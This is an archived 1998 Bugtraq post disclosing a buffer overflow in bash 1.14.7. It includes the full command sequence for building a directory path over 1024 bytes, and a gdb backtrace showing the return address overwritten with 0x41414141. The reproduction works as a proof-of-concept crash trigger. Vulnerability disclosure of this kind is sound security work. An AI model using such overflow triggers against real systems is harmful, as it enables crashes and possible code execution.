Bugtraq mailing list archives
Buffer overflow in bash 1.14.7(1)
From: root () EINSTEIN DHIS EU ORG (Joao Manuel Carolino)
Date: Fri, 4 Sep 1998 16:09:28 +0000
If you cd in to a directory which has a path name larger than 1024 bytes and you have '\w' included in your PS1 environment variable (which makes the path to the current working directory appear in each command line prompt), a buffer overflow will occur. The following was tested on my machine, running Slackware 3.5: einstein:~# gdb bash [...] (gdb) r Starting program: /bin/bash bash# PS1='\w ' ~ cd /tmp /tmp mkdir `perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp cd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x804ed72 in sigprocmask () (gdb) backtrace #0 0x804ed72 in sigprocmask () #1 0xe9 in ?? () #2 0x41414141 in ?? () Cannot access memory at address 0x41414141. Regards, Joao
Current thread:
- Buffer overflow in bash 1.14.7(1) Joao Manuel Carolino (Sep 04)
- Re: Buffer overflow in bash 1.14.7(1) Michael Riepe (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Chet Ramey (Sep 08)
- sshd exploit? Navindra Umanee (Sep 05)
- Re: sshd exploit? Seth David Schoen (Sep 06)
- Reading read-protected devices in *BSD Hubert Feyrer (Sep 06)
- Re: Reading read-protected devices in *BSD Todd C. Miller (Sep 06)
- Re: Reading read-protected devices in *BSD Eivind Eklund (Sep 06)
- Another way to crash HP 5M/5N printers bwoodard () CISCO COM (Sep 05)
- Windows File Share Scanner ZyklonB Zombie (Sep 05)